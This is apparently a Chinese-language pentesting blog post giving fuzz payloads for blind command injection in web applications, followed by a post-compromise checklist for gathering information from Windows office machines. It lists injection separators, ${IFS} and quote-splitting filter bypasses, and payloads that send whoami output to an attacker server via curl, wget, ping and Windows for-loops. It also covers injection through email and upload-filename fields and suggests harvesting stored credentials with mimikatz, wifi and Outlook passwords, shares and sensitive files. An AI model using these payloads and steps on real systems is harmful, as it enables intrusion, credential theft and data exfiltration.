写在文前:
我们在web攻防期间有很多时候有一种感觉:那就是遇到rce漏洞时,bp放包的时候有一种隐隐的感觉,有的时候bp的反包字节大小莫名其妙的怪异,有经验的老师傅就索性直接跑RCE的fuzz字典,所以本篇就日常记录一些有关于web攻防期间的一些fuzz技巧
即我们可以在关键参数后面使用管道符号和连接符fuzz命令执行实现我们的盲打:
||和&
linux机器的fuzz同上
||和&
Linux下过滤空格可以使用: ${IFS},$IFS,$IFS$9 JSON格式下的测试: \u000awget\u0020 http://ipLinux下可以包括反引号,windows下不可以。
rce fuzz命令如下:
bin4xin@bin4xin's MacbookPro tools % curl 192.168.101.51:8000/`whoami`同时我们反过来看web日志记录:
::ffff:192.168.101.51 - - [19/Sep/2020 13:57:25] "GET /bin4xin HTTP/1.1" 301 -同理各位可以发散思维:
ping whoami.服务器地址
如上,ping、curl同样适用。
一些特殊字符绕过姿势:
curl http://服务器地址/$(whoami) curl http://服务器地址/$(whoami|base64) 'w'g'e't${IFS}服务器地址各位可以自行实验在linux下的效果。
fuzz技巧是一样的,只是fuzz命令有一些区别;
ping %USERNAME%.服务器地址 ------ (获取计算机名) for /F %x in ('whoami') do start http://服务器地址/%x ------ (获取用户名称) for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.服务器地址 ------ 测试邮箱:`wget%209服务器地址/xxxx`@qq.com 测试上传:`sleep 10`filename 测试filenname:`||wget%20服务器地址` 测试上传处下的名称: ;payload|payload&payload ;whoami|whoami&whoami ------机器进程
杀软/edrteamviewer/等远程管理工具服务类进程:mssql/java/web服务安装软件列表
当前windows 凭证管理器存储的密码
登录密码(mimikatz)
wifi密码
outlook密码
……
机器开放端口信息/防火墙信息/获取机器共享
netstat -naop wmic share get name,path,status #利用wmic查找共享获取机器所有rdp连接记录
获取所有盘符
wmic logicaldisk where drivetype=3 get name,freespace,systemname,filesystem,volumeserialnumber,size #查看分区 获取全盘所有敏感文件 .doc\xlsx\md\sql\ppt*\txt等等文件: for /r D:\ %i in (*.doc) do @echo %i for /r D:\ %i in (*.xlsx) do @echo %i for /r D:\ %i in (*.ppt*)) do @echo %i 本地环境 hosts环境变量补丁列表当前主机的会话信息部分文章版权来自网络,若原作者介意可联系「chihou.pro@gmail.com」删除。
工作不饱和 总结了一下个人办公机信息收集思路。其实这样的技巧还有很多,本文权当抛砖引玉。
